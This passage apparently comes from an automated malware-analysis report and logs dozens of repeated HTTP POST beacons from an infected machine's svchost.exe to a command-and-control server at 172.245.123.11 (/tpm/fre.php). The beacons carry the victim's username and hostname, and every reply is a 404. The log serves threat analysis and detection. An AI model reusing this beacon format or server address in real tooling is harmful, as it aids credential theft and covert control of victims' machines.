                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:03:04.679877996 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:03:05.175579071 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:03:05 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              98192.168.2.550076172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:03:05.314588070 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:03:05.319446087 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:03:05.821984053 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:03:05 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              99192.168.2.550077172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:03:05.971131086 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:03:05.975970030 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:03:06.488594055 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:03:06 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              100192.168.2.550078172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:03:06.635051012 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:03:06.639843941 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:03:07.160923958 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:03:07 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              101192.168.2.550079172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:03:07.308068037 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:03:07.327650070 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:03:07.986324072 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:03:07 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              102192.168.2.550080172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:03:08.127477884 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:03:08.132275105 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:03:08.655086040 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:03:08 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              103192.168.2.550081172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:03:08.801397085 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:03:08.806380033 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:03:09.305763006 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:03:09 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              104192.168.2.550082172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:03:09.455148935 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:03:09.459975958 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:03:09.979574919 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:03:09 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              105192.168.2.550083172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:03:10.127399921 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:03:10.132210016 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:03:10.638492107 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:03:10 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              106192.168.2.550084172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:03:10.783771992 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:03:10.788630009 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:03:11.312037945 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:03:11 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              107192.168.2.550085172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:03:11.455241919 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:03:11.460088968 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:03:11.962011099 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:03:11 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              108192.168.2.550086172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:03:12.122215986 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:03:12.127099037 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:03:12.613564014 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:03:12 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              109192.168.2.550087172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:03:12.751332998 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:03:12.756186962 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:03:13.254630089 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:03:13 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              110192.168.2.550088172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:03:13.394450903 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:03:13.399252892 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:03:13.969722986 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:03:13 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              111192.168.2.550089172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:03:14.112335920 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:03:14.117177010 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:03:14.622642994 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:03:14 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              112192.168.2.550090172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:03:14.766930103 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:03:14.771733999 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:03:15.287640095 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:03:15 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              113192.168.2.550091172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:03:15.498904943 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:03:15.503726006 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:03:16.005959034 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:03:15 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              114192.168.2.550092172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:03:16.141899109 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:03:16.146706104 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:03:16.664949894 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:03:16 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              115192.168.2.550093172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:03:16.824640036 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
